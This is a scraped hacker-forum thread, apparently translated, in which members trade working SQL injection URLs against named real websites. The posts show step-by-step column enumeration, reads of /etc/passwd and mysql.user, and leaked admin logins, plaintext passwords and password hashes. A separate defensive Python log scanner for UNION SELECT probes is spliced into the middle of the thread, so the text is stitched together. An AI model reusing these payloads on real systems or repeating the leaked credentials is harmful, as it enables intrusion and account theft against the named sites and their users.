SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Guys, help: for the request "id=9999+union+select+null,null,null/*" SQL returns this message: "The used SELECT statements have a different number of columns", and I'm a dummy and can't figure out what to do... :(
     
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    mff, the number of output fields doesn't match. Use a different one, for example select 1,2/* select 1,2,3/* and so on, until this error disappears. In general, there is another thread for this.
     
  3. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Thanks Piflit, I'll try! Here's another one I got, for the request "id=9999'+union+select+1,2,3/*": "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"
     
  4. Spaise

    Spaise Elder

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    The quote isn't needed.
     
    2 people like this.
  5. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Yep, removed it! But it's still not working; I'm going through 1,2,3.. and so on, and PHP returns "The used SELECT statements have a different number of columns"
     
  6. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Hooray, it worked, I'm just an impatient dummy...
     
  7. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Guys, so what do I do next? I got DATABASE(), USER(), VERSION() and LOAD_FILE('/etc/passwd')! But what do I do with all this? I just need a dump of the database, or a login via phpMyAdmin, or an FTP account.

    Please help :(
     
  8. bag

    bag Elder

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Hmm, I was looking for a bag in online shops and found an SQL injection =)
    Although it's not an online shop, but still
    http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    5.1.16-beta
    catalog1
    catalog1@localhost
     
  9. mff

    mff Elder

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Guys, what does "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" mean, for the request "id=9999+union+select+1,2,3,mysql.user.password,5,6,7+from+mysql.user/*"?
     
  10. bag

    bag Elder

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    Enough messing around here already; go read the articles, everything is on this site.

    Anyway, here:
    http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,concat_ws(0x2F,user,password),5,6,7+from+mysql.user/*
     
    3 people like this.
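
A defender-side view of the requests quoted in the posts above, as an added example that is not part of the original thread: a log scanner that flags UNION SELECT probes in query strings and notices when one client cycles through several column counts. The log lines, IP addresses and paths are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (documentation IPs, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Mar/2008:10:00:01 +0000] "GET /news.php?id=9999+union+select+1,2/* HTTP/1.1" 200 512
203.0.113.7 - - [24/Mar/2008:10:00:03 +0000] "GET /news.php?id=9999+union+select+1,2,3/* HTTP/1.1" 200 512
203.0.113.7 - - [24/Mar/2008:10:00:05 +0000] "GET /news.php?id=9999+UNION+SELECT+1,2,3,4/* HTTP/1.1" 200 2048
203.0.113.7 - - [24/Mar/2008:10:00:09 +0000] "GET /news.php?id=-1+union+select+1,version(),3,4/* HTTP/1.1" 200 2050
198.51.100.4 - - [24/Mar/2008:10:01:30 +0000] "GET /search.php?q=student+union+elections HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)(?:\s+from\b|/\*|--|#|$)", re.I | re.S)
EXTRA = {
    "schema-read": re.compile(r"information_schema|mysql\.user", re.I),
    "file-read": re.compile(r"load_file\s*\(", re.I),
    "fingerprint": re.compile(r"\b(?:version|user|database)\s*\(\s*\)", re.I),
}

def count_columns(select_list):
    """Count top-level commas so concat_ws(a,b) is one column, not two."""
    depth, cols = 0, 1
    for ch in select_list:
        depth += ch == "("
        depth -= ch == ")"
        cols += (ch == "," and depth == 0)
    return cols

def scan(log_text):
    """Return {client: {"columns": [...], "tags": set(), "enumerating": bool}}."""
    hits = defaultdict(lambda: {"columns": [], "tags": set(), "enumerating": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl decodes both %xx and '+' the way the web server would.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            u = UNION_RE.search(value)
            if not u:
                continue
            h = hits[client]
            h["columns"].append(count_columns(u.group(1)))
            h["tags"].update(t for t, rx in EXTRA.items() if rx.search(value))
            # Several distinct column counts from one client = column probing.
            h["enumerating"] = len(set(h["columns"])) >= 3
    return dict(hits)
```

The search request containing the word "union" is not flagged, because the pattern requires `select` to follow it.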
  11. CaNNabi$

    CaNNabi$ Elder

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Damn, don't post questions here; ask your questions HERE!
     
    2 people like this.
  12. samarin

    samarin Elder

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Tables that caught my eye
    дима:дима:[email protected]
    ---------------------------------------------------------------------
    ---------------------------------------------------------------------
    БIЗНЕС-ПОРТАЛ
    CЛАВУТЧИНИ

    5.0.22-log:kraibiz@localhost:Comissar42_krai

    ----------------------------------------------------------------------
    ---------------------------------------------------------------------
    skyinform
    we know everything about air transport

    there is access to information_schema.tables
     
    #5132 samarin, 23 Mar 2008
    Last edited: 24 Mar 2008
    2 people like this.
  13. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/*
    VERSION: 5.0.27-standard
    USER: [email protected]
    DATABASE: cmeadmin_comexusonline
    PR: 6
     
    1 person likes this.
  14. $n@ke

    $n@ke Elder

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    admin:abcat5&dog5
     
    2 people like this.
  15. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    VERSION: 4.0.27-log
    DATABASE: xbizpress
    USER: [email protected]
    PR: 4

    ***************************************

    Everyone should urgently host here:

    Code:
    http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),user())/*
    VERSION: 4.1.11-Debian_4sarge8-log
    DATABASE: usr_sat0_4
    USER: sat0@localhost
    PR: 3

    Code:
    http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+admin/*
    host247:3727ee3a03fac1457d6aa96e372ada0c
     
    #5135 t0ox, 24 Mar 2008
    Last edited: 24 Mar 2008
  16. bag

    bag Elder

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    http://www.gamingreport.com/print.php?sid=249729999+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(),user())/*
    the site is teeming with SQL injections
    --------
    http://www.nfb.ca/sections/thematique.php?id=102+and+substring(version(),1,1)=5/*
    http://www.worldnetdaily.com/index.php?fa=PAGE.view&pageId=5845899999+UNION+SELECT+1,2,3,4,5,6,7,8/*
     
    2 people like this.
  17. Klaus Doring

    Klaus Doring Elder

    Joined:
    23 Jul 2007
    Messages:
    48
    Likes Received:
    16
    Reputations:
    0
    admin : 4cb9c8a8048fd02294477fcb1a41191a
     
  18. Snap

    Snap Elder

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Dance club "Rossis"

    http://www.rossis.ru/news/?nid=-6+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5+from+information_schema.columns+limit+1,1/*

    http://www.rossis.ru/news/?nid=-6+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password),0x71),0x71),4,5+from+titles+limit+0,1/*
    (No output :( )

    ---------------------------------------------------------------------------------------------

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(user_name,char(58),user_password,char(58),user_id),7+from+cpg130_users+limit+1,3/*

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat(username,char(58),password),7+from+users+limit+0,100/*

    http://www.superpopugai.ru/?page=video&birds_id=79+union+select+1,2,3,4,5,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),7+from+INFORMATION_SCHEMA.COLUMNS+limit+0,50000/*
     
    #5138 Snap, 24 Mar 2008
    Last edited: 24 Mar 2008
    1 person likes this.
  19. t0ox

    t0ox Member

    Joined:
    23 Oct 2007
    Messages:
    17
    Likes Received:
    16
    Reputations:
    0
    Code:
    http://www.gykd.co.za/gykd/reviews/bikes.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(version(),database(),user()),11,12,13,14,15,16,17,18,19/*
    DATABASE: gykd
    VERSION: 4.0.17
    USER: web@localhost
    PR: 2

    ******************************

    Code:
    http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
    DATABASE: boskobosko
    VERSION: 5.0.44-log
    USER: [email protected]
    PR: 4

    Code:
    http://www.muzyka.bosko.pl/mp3/?id=-1+union+select+1,pass,3,4,5,6,login,8,id,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users+where+id=1/*
    LOGIN: wrzeszcz
    PASS: bosko

    ******************************

    Corrections to my post.

    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,3/*
    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(version(),database(),user())/*
    DATABASE: rtf
    VERSION: 5.0.22
    USER: root@localhost
    PR: 6

    Code:
    http://www.rtp.org/main/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,userpassword)+from+user/*
    carla:52a250762b8d0573

    Couldn't crack the hash

    http://www.rtp.org/admin/loginform.php
     
    #5139 t0ox, 24 Mar 2008
    Last edited: 24 Mar 2008
    1 person likes this.
  20. Loker

    Loker Elder

    Joined:
    25 Oct 2007
    Messages:
    46
    Likes Received:
    23
    Reputations:
    5
    http://sanprosvet.ru/ru/page/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/*

    Version 5.27

    Feng shui
    http://www.fengshuiby.com/ru/page/index.php?id=-8+union+select+1,2,3,4,5,6,7,8,Version(),10,11,12,13,14,15,16,17,18,19,20/*
    Version 4.1.22-standart
    User siteis_user@localhost
    Database siteis_siteis
     
    #5140 Loker, 24 Mar 2008
    Last edited: 24 Mar 2008